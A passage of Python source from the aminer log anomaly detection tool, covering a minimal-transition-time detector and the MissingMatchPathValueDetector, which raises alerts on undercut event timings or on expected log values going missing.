(only if id path is set). does not refer to an existing parsed data object. @param num_log_lines_solidify_matrix number of processed log lines after which the matrix is solidified. This process is periodically repeated. @param time_output_threshold threshold for the tested minimal transition time which has to be exceeded to be tested. @param anomaly_threshold threshold for the confidence which must be exceeded to raise an anomaly. @param persistence_id name of persistence file. @param learn_mode specifies whether newly observed sequences should be added to the learned model @param output_logline specifies whether the full parsed log atom should be provided in the output. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "id_path_list", "ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, id_path_list=id_path_list, ignore_list=ignore_list, allow_missing_id=allow_missing_id, num_log_lines_solidify_matrix=num_log_lines_solidify_matrix, time_output_threshold=time_output_threshold, anomaly_threshold=anomaly_threshold, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) # Test if both target_path_list and id_path_list are not empty if [] in (self.target_path_list, self.id_path_list): msg = 'Both target_path_list and id_path_list must not be empty.' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) # Initialization auxiliary variables self.time_matrix = {} self.last_value = {} self.last_time = {} self.log_total = 0 # Load persistence self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: return_matrix = persistence_data[0] keys_1 = [tuple(key) for key in persistence_data[1]] keys_2 = [[tuple(key) for key in persistence_data[2][i]] for i in range(len(persistence_data[2]))] self.time_matrix = {keys_1[i]: {keys_2[i][j]: return_matrix[i][j] for j in range(len(keys_2[i]))} for i in range(len(keys_1))} def receive_atom(self, log_atom): """Receive a log atom from a source and analyzes minimal times between transitions.""" parser_match = log_atom.parser_match # Do not analyze the log line if target_path_list or id_path_list is empty if [] in (self.target_path_list, self.id_path_list): return False # Skip paths from ignore list. if any(ignore_path in parser_match.get_match_dictionary().keys() for ignore_path in self.ignore_list): return False # Skip line if atom_time is not defined. if log_atom.atom_time is None: return False # Increase the count by one and check if the matrix should be solidified. self.log_total += 1 if self.log_total % self.num_log_lines_solidify_matrix == 0: self.solidify_matrix() # Use target_path_list to differentiate sequences by their id. event_value = () for path in self.target_path_list: match = log_atom.parser_match.get_match_dictionary().get(path) if match is None: if self.allow_missing_id is True: # Insert placeholder for path that is not available event_value += ('',) else: # Omit log atom if one of the id paths is not found. return False else: if isinstance(match.match_object, bytes): event_value += (match.match_object.decode(AminerConfig.ENCODING),) else: event_value += (match.match_object,) # Get current index from combination of values of paths of id_path_list id_tuple = () for id_path in self.id_path_list: id_match = log_atom.parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_id is True: # Insert placeholder for id_path that is not available id_tuple += ('',) else: # Omit log atom if one of the id paths is not found. return False else: if isinstance(id_match.match_object, bytes): id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (id_match.match_object,) # Check if id_tuple has already appeared. if id_tuple not in self.last_value: # Initialize the last value and time self.last_value[id_tuple] = event_value self.last_time[id_tuple] = log_atom.atom_time else: # Check if the event_value changed or if the times are not strictly ascending and skip the line in that cases. if self.last_value[id_tuple] == event_value: self.last_time[id_tuple] = log_atom.atom_time return True if log_atom.atom_time - self.last_time[id_tuple] < 0: additional_information = {'AffectedLogAtomValues': [list(self.last_value[id_tuple]), list(event_value)], 'AffectedIdValues': list(id_tuple), 'PreviousTime': self.last_time[id_tuple], 'NewTime': log_atom.atom_time} self.print(f'Anomaly in log line order: {list(self.last_value[id_tuple])} - {list(event_value)} ({list(id_tuple)}): ' f'{self.last_time[id_tuple]} - {log_atom.atom_time}', log_atom, self.target_path_list, confidence=1, additional_information=additional_information) return True # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_value in self.time_matrix and self.last_value[id_tuple] in self.time_matrix[event_value]: event_value_1 = event_value event_value_2 = self.last_value[id_tuple] elif self.last_value[id_tuple] in self.time_matrix and event_value in self.time_matrix[self.last_value[id_tuple]]: event_value_1 = self.last_value[id_tuple] event_value_2 = event_value if event_value_1 is None: # Initialize the entry in the time matrix if event_value not in self.time_matrix: self.time_matrix[event_value] = {} additional_information = {'AffectedLogAtomValues': [list(self.last_value[id_tuple]), list(event_value)], 'AffectedIdValues': list(id_tuple), 'NewMinimalTime': log_atom.atom_time - self.last_time[id_tuple]} message = f'First Appearance: {list(self.last_value[id_tuple])} - {list(event_value)} ({list(id_tuple)}),' \ f' {log_atom.atom_time - self.last_time[id_tuple]}' self.print(message, log_atom, self.target_path_list, additional_information=additional_information) if self.learn_mode: self.time_matrix[event_value][self.last_value[id_tuple]] = log_atom.atom_time - self.last_time[id_tuple] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time else: # Check and update if the time was under cut if self.time_matrix[event_value_1][event_value_2] > log_atom.atom_time - self.last_time[id_tuple] and\ self.time_matrix[event_value_1][event_value_2] > self.time_output_threshold: if 1 - (log_atom.atom_time - self.last_time[id_tuple]) / self.time_matrix[event_value_1][event_value_2] >\ self.anomaly_threshold: additional_information = {'AffectedLogAtomValues': [list(self.last_value[id_tuple]), list(event_value)], 'AffectedIdValues': list(id_tuple), 'PreviousMinimalTime': self.time_matrix[event_value_1][event_value_2], 'NewMinimalTime': log_atom.atom_time - self.last_time[id_tuple]} message = f'Undercut transition time: {list(self.last_value[id_tuple])} - {list(event_value)} ({list(id_tuple)}),' \ f' {self.time_matrix[event_value_1][event_value_2]} -> {log_atom.atom_time - self.last_time[id_tuple]}' confidence = 1 - (log_atom.atom_time - self.last_time[id_tuple]) / self.time_matrix[event_value_1][event_value_2] self.print( message, log_atom, self.target_path_list, confidence=confidence, additional_information=additional_information) if self.learn_mode: self.time_matrix[event_value_1][event_value_2] = log_atom.atom_time - self.last_time[id_tuple] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time # Update the last_value and time self.last_value[id_tuple] = event_value self.last_time[id_tuple] = log_atom.atom_time return True def solidify_matrix(self): """Solidify minimal time matrix with the trianlge inequality.""" # Initialize list old_pairs with all transitions and a list of all values # The list of old_pairs includes the minimal times which can be used to reduce the minimal ransition times of other transitions values = list(self.time_matrix.keys()) for key1 in self.time_matrix: values += [key for key in self.time_matrix[key1] if key not in values] old_pairs = [[key1, key2] for key1 in self.time_matrix for key2 in self.time_matrix[key1]] # Check the triangle inequality as long as values are corrected while len(old_pairs) > 0: new_pairs = [] for old_pair in old_pairs: # Check triangle inequality value - old_pair[0] - old_pair[1] > value - old_pair[1] and # old_pair[0] - old_pair[1] - value > value - old_pair[0] for value in values: if value in (old_pair[0], old_pair[1]): continue # Check value - old_pair[0] - old_pair[1] > value - old_pair[1] if (old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]) or ( value in self.time_matrix and old_pair[0] in self.time_matrix[value]): if old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]: key_1_1 = old_pair[0] key_1_2 = value else: key_1_1 = value key_1_2 = old_pair[0] if old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]: key_2_1 = old_pair[1] key_2_2 = value else: key_2_1 = value key_2_2 = old_pair[1] if key_2_1 not in self.time_matrix: self.time_matrix[key_2_1] = {} if (key_2_2 not in self.time_matrix[key_2_1] or self.time_matrix[key_1_1][key_1_2] + self.time_matrix[old_pair[0]][old_pair[1]] < self.time_matrix[key_2_1][key_2_2]): self.time_matrix[key_2_1][key_2_2] = self.time_matrix[key_1_1][key_1_2] +\ self.time_matrix[old_pair[0]][old_pair[1]] if [key_2_1, key_2_2] not in new_pairs: new_pairs += [[key_2_1, key_2_2]] # Check old_pair[0] - old_pair[1] - value > value - old_pair[0] if (old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]) or ( value in self.time_matrix and old_pair[1] in self.time_matrix[value]): if old_pair[1] in self.time_matrix and value in self.time_matrix[old_pair[1]]: key_1_1 = old_pair[1] key_1_2 = value else: key_1_1 = value key_1_2 = old_pair[1] if old_pair[0] in self.time_matrix and value in self.time_matrix[old_pair[0]]: key_2_1 = old_pair[0] key_2_2 = value else: key_2_1 = value key_2_2 = old_pair[0] if key_2_1 not in self.time_matrix: self.time_matrix[key_2_1] = {} if (key_2_2 not in self.time_matrix[key_2_1] or self.time_matrix[key_1_1][key_1_2] + self.time_matrix[old_pair[0]][old_pair[1]] < self.time_matrix[key_2_1][key_2_2]): self.time_matrix[key_2_1][key_2_2] = self.time_matrix[key_1_1][key_1_2] +\ self.time_matrix[old_pair[0]][old_pair[1]] if [key_2_1, key_2_2] not in new_pairs: new_pairs += [[key_2_1, key_2_2]] old_pairs = new_pairs def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persist_data = [] keys_1 = list(self.time_matrix.keys()) keys_2 = [list(self.time_matrix[key].keys()) for key in keys_1] return_matrix = [[self.time_matrix[keys_1[i]][keys_2[i][j]] for j in range(len(keys_2[i]))] for i in range(len(keys_1))] persist_data.append(return_matrix) persist_data.append(keys_1) persist_data.append(keys_2) PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = 'Allowlisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f'Allowlisted path {event_data}.' def print_persistence_event(self, event_type, event_data): """ Prints the persistence of component_name. Event_data specifies what information is output. @return a message with information about the persistence. @throws Exception when the output for the event_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has one of the stated formats if not (isinstance(event_data, list) and len(event_data) <= 2 and ( (len(event_data) == 2 and isinstance(event_data[0], list) and isinstance(event_data[1], list) and len(event_data[0]) == len(self.target_path_list) and len(event_data[1]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0]) and all(isinstance(value, str) for value in event_data[1])) or ( len(event_data) == 1 and isinstance(event_data[0], list) and len(event_data[0]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)): msg = 'Event_data has the wrong format.' \ 'The supported formats are [], [path_value_list] and [path_value_list_1, path_value_list_2], ' \ 'where the path value lists are lists of strings with the same length as the defined paths in the config.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples for i in range(len(event_data)): event_data[i] = tuple(event_data[i]) if len(event_data) == 0: # Print the set of all appeared path values if no event_data is given values_set = set(self.time_matrix.keys()) for value in list(values_set): for value_2 in self.time_matrix[value]: values_set.add(value_2) values_list = list(values_set) values_list.sort() string = f'Persistence includes transition times to the following path values: {values_list}' elif len(event_data) == 1: # Print the set of all path values which have a transition time to the path value specified in event_data # Check if the path value has an entry in self.time_matrix if event_data[0] in self.time_matrix: values_set = set(self.time_matrix[event_data[0]].keys()) else: values_set = set() # Check if key values in self.time_matrix contain the path value of event_data for value in list(self.time_matrix.keys()): if event_data[0] in self.time_matrix[value]: values_set.add(value) values_list = list(values_set) values_list.sort() # Set output string if len(values_set) > 0: string = f'Persistence includes transition times from {event_data[0]} to the following path values: {values_list}' else: string = f'Persistence includes no transition time from {event_data[0]}.' else: # Print the transition time # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_data[0] in self.time_matrix and event_data[1] in self.time_matrix[event_data[0]]: event_value_1 = event_data[0] event_value_2 = event_data[1] elif event_data[1] in self.time_matrix and event_data[0] in self.time_matrix[event_data[1]]: event_value_1 = event_data[1] event_value_2 = event_data[0] # Set output string if event_value_1 is None: string = f'No transition time for {list(event_data[0])} - {list(event_data[1])}.' else: string = f'Transition time {list(event_data[0])} - {list(event_data[1])}: {self.time_matrix[event_value_1][event_value_2]}.' return string def add_to_persistence_event(self, event_type, event_data): """ Add or overwrite the information of event_data to the persistence of component_name. @return a message with information about the addition to the persistence. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has the stated format if not (isinstance(event_data, list) and len(event_data) == 3 and isinstance(event_data[0], list) and isinstance(event_data[1], list) and len(event_data[0]) == len(self.target_path_list) and len(event_data[1]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0]) and all(isinstance(value, str) for value in event_data[1]) and isinstance(event_data[2], (int, float))): msg = 'Event_data has the wrong format.' \ 'The supported format is [path_value_list_1, path_value_list_2, new_transition_time], ' \ 'where the path value lists are lists of strings with the same length as the defined paths in the config.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples event_data[0] = tuple(event_data[0]) event_data[1] = tuple(event_data[1]) # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_data[0] in self.time_matrix and event_data[1] in self.time_matrix[event_data[0]]: event_value_1 = event_data[0] event_value_2 = event_data[1] elif event_data[1] in self.time_matrix and event_data[0] in self.time_matrix[event_data[1]]: event_value_1 = event_data[1] event_value_2 = event_data[0] if event_value_1 is None: # Initialize the entry in the time matrix if event_data[0] not in self.time_matrix: self.time_matrix[event_data[0]] = {} self.time_matrix[event_data[0]][event_data[1]] = float(event_data[2]) return f'Added transition time: {list(event_data[0])} - {list(event_data[1])}, {float(event_data[2])}' old_transition_time = self.time_matrix[event_value_1][event_value_2] self.time_matrix[event_value_1][event_value_2] = float(event_data[2]) return f'Changed transition time {list(event_data[0])} - {list(event_data[1])} from {old_transition_time} to {float(event_data[2])}' def remove_from_persistence_event(self, event_type, event_data): """ Removes the information of event_data from the persistence of component_name. @return a message with information about the removal from the persistence. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has the stated format if not (len(event_data) == 2 and isinstance(event_data[0], list) and isinstance(event_data[1], list) and len(event_data[0]) == len(self.target_path_list) and len(event_data[1]) == len(self.target_path_list) and all(isinstance(value, str) for value in event_data[0]) and all(isinstance(value, str) for value in event_data[1])): msg = 'Event_data has the wrong format. ' \ 'The supported format is [path_value_list_1, path_value_list_2], ' \ 'where the path value lists are lists of strings with the same length as the defined paths in the config.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples event_data[0] = tuple(event_data[0]) event_data[1] = tuple(event_data[1]) # Check in which order the event_values appear in the time matrix event_value_1 = None event_value_2 = None if event_data[0] in self.time_matrix and event_data[1] in self.time_matrix[event_data[0]]: event_value_1 = event_data[0] event_value_2 = event_data[1] elif event_data[1] in self.time_matrix and event_data[0] in self.time_matrix[event_data[1]]: event_value_1 = event_data[1] event_value_2 = event_data[0] # Check if the transition time between the path values exists if event_value_1 is None: string = f'Transition time for {list(event_data[0])} - {list(event_data[1])} does not exist and therefore could not be deleted.' else: # Delete the transition time deleted_time = self.time_matrix[event_value_1].pop(event_value_2) # Delete the entry to event_value_1 if it is empty if self.time_matrix[event_value_1] == {}: self.time_matrix.pop(event_value_1) string = f'Deleted transition time {list(event_data[0])} - {list(event_data[1])}: {deleted_time}.' return string def blocklist_event(self, event_type, event_data, blocklisting_data): """ Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = 'Blocklisting data not understood by this detector' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f'Blocklisted path {event_data}.' def print(self, message, log_atom, affected_path, confidence=None, additional_information=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] if additional_information is None: additional_information = {} original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if original_log_line_prefix is None: original_log_line_prefix = '' if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode()] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = '' for x in affected_path: tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + log_atom.raw_data.decode()] analysis_component = {'AffectedLogAtomPaths': affected_path} for key, value in additional_information.items(): analysis_component[key] = value event_data = {'AnalysisComponent': analysis_component, 'TypeInfo': {}} if confidence is not None: event_data['TypeInfo']['Confidence'] = confidence for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) MissingMatchPathValueDetector.py000066400000000000000000000504031437606560100372210ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module provides the MissingMatchPathValueDetector to generate events when expected values were not seen for an extended period of time. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD,\ STAT_LOG_NAME from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class MissingMatchPathValueDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface): """ This class creates events when an expected value is not seen within a given timespan. For example because the service was deactivated or logging disabled unexpectedly. This is complementary to the function provided by NewMatchPathValueDetector. For each unique value extracted by paths, a tracking record is added to expected_values_dict. It stores three numbers: the timestamp the extracted value was last seen, the maximum allowed gap between observations and the next alerting time when currently in error state. When in normal (alerting) state, the value is zero. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id='Default', learn_mode=False, default_interval=3600, realert_interval=86400, combine_values=True, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param learn_mode specifies whether new expected values should be learned. @param default_interval time in seconds before a value is reported missing. The parameter is applied to the parsed record data time, not the system time. Hence, reports can be delayed when no data is received. @param realert_interval time in seconds before a value is reported missing for a second time. The parameter is applied to the parsed record data time, not the system time. Hence, reports can be delayed when no data is received. @param combine_values if true the combined values are used as identifiers. When false, individual values are checked. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, learn_mode=learn_mode, default_interval=default_interval, realert_interval=realert_interval, output_logline=output_logline, combine_values=combine_values, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) # This timestamp is compared with timestamp values from log atoms for activation of alerting logic. The first timestamp from logs # above this value will trigger alerting. self.next_check_timestamp = 0 self.last_seen_timestamp = 0 self.log_learned_values = 0 self.log_new_learned_values = [] self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) self.expected_values_dict = {} if persistence_data is not None: for key in persistence_data: value = persistence_data[key] if self.target_path_list is not None: # skipcq: PTC-W0048 if (value[3] not in self.target_path_list and not self.combine_values) or ( value[3] != str(self.target_path_list) and self.combine_values): continue elif self.target_path_list is not None and value[3] not in self.target_path_list: continue if value[1] != default_interval: value[1] = default_interval value[2] = value[0] + default_interval self.expected_values_dict[key] = value logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) self.analysis_string = 'Analysis.%s' def receive_atom(self, log_atom): """ Receive a log atom from a source. @param log_atom binary raw atom data @return True if this handler was really able to handle and process the atom. Depending on this information, the caller may decide if it makes sense passing the atom also to other handlers or to retry later. This behaviour has to be documented at each source implementation sending log atoms. """ self.log_total += 1 if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False value = self.get_channel_key(log_atom) if value is None or (not value[0] and not value[1]): return False target_paths, value_list = value if isinstance(target_paths, str) and isinstance(value_list, str): target_paths = [target_paths] value_list = [value_list] timestamp = log_atom.get_timestamp() if timestamp is None: timestamp = time.time() for i, target_path in enumerate(target_paths): value = value_list[i] detector_info = self.expected_values_dict.get(value) if detector_info is None and self.learn_mode: self.expected_values_dict[value] = [timestamp, self.default_interval, 0, target_path] self.next_check_timestamp = min(self.next_check_timestamp, timestamp + self.default_interval) self.log_learned_values += 1 self.log_new_learned_values.append(value) if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time self.check_timeouts(timestamp, log_atom) for i, target_path in enumerate(target_paths): value = value_list[i] detector_info = self.expected_values_dict.get(value) if detector_info is not None: # Just update the last seen value and switch from non-reporting error state to normal state. detector_info[0] = timestamp if detector_info[2] != 0: if timestamp >= detector_info[2]: detector_info[2] = 0 # Delta of this detector might be lower than the default maximum recheck time. self.next_check_timestamp = min(self.next_check_timestamp, timestamp + detector_info[1]) self.log_success += 1 return True def get_channel_key(self, log_atom): """Get the key identifying the channel this log_atom is coming from.""" value_list = [] path_list = [] for target_path in self.target_path_list: match = log_atom.parser_match.get_match_dictionary().get(target_path) if match is None: if self.combine_values: return None continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): affected_log_atom_values = match.match_object.decode(AminerConfig.ENCODING) else: affected_log_atom_values = match.match_object value_list.append(str(affected_log_atom_values)) path_list.append(target_path) if self.combine_values: value_list = str(value_list) path_list = str(path_list) return path_list, value_list def check_timeouts(self, timestamp, log_atom): """Check if there was any timeout on a channel, thus triggering event dispatching.""" old_last_seen_timestamp = self.last_seen_timestamp self.last_seen_timestamp = max(self.last_seen_timestamp, timestamp) if self.last_seen_timestamp > self.next_check_timestamp: missing_value_list = [] # Start with a large recheck interval. It will be lowered if any of the expectation intervals is below that. if self.next_check_timestamp == 0: self.next_check_timestamp = self.last_seen_timestamp + self.realert_interval for value, detector_info in self.expected_values_dict.items(): value_overdue_time = int(self.last_seen_timestamp - detector_info[0] - detector_info[1]) if detector_info[2] != 0: next_check_delta = detector_info[2] - self.last_seen_timestamp if next_check_delta > 0: # Already alerted but not ready for realerting yet. self.next_check_timestamp = min(self.next_check_timestamp, detector_info[2]) continue else: # No alerting yet, see if alerting is required. if value_overdue_time < 0: old = self.next_check_timestamp self.next_check_timestamp = min(self.next_check_timestamp, self.last_seen_timestamp - value_overdue_time) if old > self.next_check_timestamp or self.next_check_timestamp < detector_info[2]: break # avoid early re-alerting if value_overdue_time > 0: missing_value_list.append([detector_info[3], value, value_overdue_time, detector_info[1]]) # Set the next alerting time. detector_info[2] = self.last_seen_timestamp + self.realert_interval self.expected_values_dict[value] = detector_info # Workaround: # also check for long gaps between same tokens where the last_seen_timestamp gets updated # on the arrival of tokens following a longer gap elif self.last_seen_timestamp - detector_info[0] > detector_info[1]: value_overdue_time = self.last_seen_timestamp - old_last_seen_timestamp - detector_info[1] missing_value_list.append([detector_info[3], value, value_overdue_time, detector_info[1]]) # Set the next alerting time. detector_info[2] = self.last_seen_timestamp + self.realert_interval self.expected_values_dict[value] = detector_info if missing_value_list: message_part = [] affected_log_atom_values = [] for target_path_list, value, overdue_time, interval in missing_value_list: e = {} try: if isinstance(value, list): data = [] for val in value: if isinstance(val, bytes): data.append(val.decode(AminerConfig.ENCODING)) else: data.append(val) data = str(data) else: if isinstance(value, bytes): data = value.decode(AminerConfig.ENCODING) else: data = repr(value) except UnicodeError: data = repr(value) if self.__class__.__name__ == 'MissingMatchPathValueDetector': e['TargetPathList'] = target_path_list message_part.append(f' {target_path_list}: {data} overdue {overdue_time}s (interval {interval})\n') else: target_paths = '' for target_path in self.target_path_list: target_paths += target_path + ', ' e['TargetPathList'] = self.target_path_list message_part.append(f' {target_paths[:-2]}: {data} overdue {overdue_time}s (interval {interval})\n') e['Value'] = str(value) e['OverdueTime'] = str(overdue_time) e['Interval'] = str(interval) affected_log_atom_values.append(e) affected_log_atom_paths = [] for path in log_atom.parser_match.get_match_dictionary().keys(): if path in self.target_path_list: affected_log_atom_paths.append(path) analysis_component = {'AffectedLogAtomPaths': affected_log_atom_paths, 'AffectedLogAtomValues': affected_log_atom_values} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: self.send_event_to_handlers(listener, event_data, log_atom, [''.join(message_part).strip()]) return True def send_event_to_handlers(self, anomaly_event_handler, event_data, log_atom, message_part): """Send an event to the event handlers.""" anomaly_event_handler.receive_event(self.analysis_string % self.__class__.__name__, 'Interval too large between values', message_part, event_data, log_atom, self) def set_check_value(self, value, interval, target_path): """Add or overwrite a value to be monitored by the detector.""" self.expected_values_dict[value] = [self.last_seen_timestamp, interval, 0, target_path] self.next_check_timestamp = 0 def remove_check_value(self, value): """Remove checks for given value.""" del self.expected_values_dict[value] logging.getLogger(DEBUG_LOG_NAME).debug("%s removed check value %s.", self.__class__.__name__, str(value)) def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" PersistenceUtil.store_json(self.persistence_file_name, self.expected_values_dict) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting using given allowlisting_data was not possible. """ if event_type != self.analysis_string % self.__class__.__name__: msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(allowlisting_data, int): msg = 'Allowlisting data has to integer with new interval, -1 to reset to defaults, other negative value to remove the entry' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) new_interval = allowlisting_data if new_interval == -1: new_interval = self.default_interval if new_interval < 0: self.remove_check_value(event_data[0]) else: self.set_check_value(event_data[0], new_interval, event_data[1]) return f"Updated '{event_data[0]}' in '{event_data[1]}' to new interval {new_interval}." def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_values) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %d new values in the last 60 minutes. Following new values" " were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_values, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_values = 0 self.log_new_learned_values = [] class 